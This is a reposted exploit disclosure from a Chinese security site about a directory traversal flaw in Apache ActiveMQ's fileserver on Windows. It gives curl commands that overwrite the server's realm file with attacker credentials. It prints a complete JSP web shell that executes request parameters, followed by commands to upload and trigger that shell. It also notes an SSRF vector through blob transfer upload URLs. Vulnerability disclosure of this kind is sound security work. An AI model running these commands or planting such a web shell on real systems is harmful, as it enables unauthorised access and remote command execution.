首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution
来源:vfocus.net 作者:Jorm 发布时间:2016-12-05  

I have recently been playing with Apache ActiveMQ, and came across a simple but interesting directory traversal flaw in the fileserver upload/download functionality.
I have only been able to reproduce this on Windows, i.e. where "\" is a path delimiter.
An attacker could use this flaw to upload arbitrary files to the server, including a JSP shell, leading to remote code execution.

Exploiting Windows systems to achieve RCE The default conf/jetty.xml includes:
 <bean class="org.eclipse.jetty.security.ConstraintMapping" id="securityConstraintMapping"> 
     <property name="constraint" ref="securityConstraint"> 
     <property name="pathSpec" value="/api/*,/admin/*,*.jsp"> 
   </property></property> 
 </bean> 
Effectively blocking the upload of JSP files into contexts that will allow them to execute.

I imagine there are many ways around this; for my proof of concept I opted to overwrite conf/jetty-realm.properties and set my own credentials:

$ cat jetty-realm.properties hacker: hacker, admin
$ curl -v -X PUT --data "@jetty-realm.properties" http://TARGET:8161/fileserver/..\\conf\\jetty-realm.properties

This seems to have the disadvantage of requiring a reboot of the server to take effect.
I am not sure if that is always the case, but if so, I'm pretty sure there is some other workaround that wouldn't require a reboot.
The attacker can then take a standard JSP shell:

$ cat cmd.jsp
 <%@ page import="java.util.*,java.io.*"%> 
 <% 
 %> 
 <HTML><BODY> 
 Commands with JSP 
 <FORM METHOD="GET" NAME="myform" ACTION=""> 
 <INPUT TYPE="text" NAME="cmd"> 
 <INPUT TYPE="submit" VALUE="Send"> 
 </FORM> 
 <pre> 
 <% 
 if (request.getParameter("cmd") != null) { 
 out.println("Command: " + request.getParameter("cmd") + "<BR>"); 
 Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); 
 OutputStream os = p.getOutputStream(); 
 InputStream in = p.getInputStream(); 
 DataInputStream dis = new DataInputStream(in); 
 String disr = dis.readLine(); 
 while ( disr != null ) { 
 out.println(disr); 
 disr = dis.readLine(); 
 } 
 } 
 %> 
 </pre> 
 </BODY></HTML> 

Upload it, exploiting the "..\" directory traversal flaw to put it into an executable context:

$ curl -u 'hacker:hacker' -v -X PUT --data "@cmd.jsp" http://TARGET:8161/fileserver/..\\admin\\cmd.jsp

And pop a calc on the server:

$ curl -u 'hacker:hacker' -v -X GET http://TARGET:8161/admin/cmd.jsp?cmd=calc.exe

Exploiting non-Windows servers

All attempts at directory traversal on a Linux system failed - encoded, double encoded, and UTF-8 encoded "../" were all caught by Jetty. Only "..\" worked.
That said, clients can specify the uploadUrl for a blob transfer, e.g.:

tcp://localhost:61616?jms.blobTransferPolicy.uploadUrl=http://foo.com

An attacker able to enqueue messages could use this to perform server side request forgery to an arbitrary uploadUrl target, even when running on non-Windows servers.

Resolution

The ActiveMQ project has released an advisory and patches.
This is not the first instance of such a flaw in an open source Java application; CVE-2014-7816 comes to mind.
It demonstrates that while Java may be platform independent, many developers are used to developing for a particular OS, and don't necessarily take cross-platform concerns into account.


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Windows Escalate UAC Protectio
·BlackStratus LOGStorm 4.5.1.35
·Opera foreignObject textNode::
·Microsoft Authorization Manage
·MS Edge CMarkup::EnsureDeleteC
·Microsoft Excel Starter 2010 -
·Disk Savvy Enterprise 9.1.14 -
·Microsoft Windows Media Center
·PDF Shaper Buffer Overflow
·Alcatel Lucent Omnivista 8770
·ntpd 4.2.8 Stack Overflow Proo
·Microsoft Event Viewer 1.0 - X
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved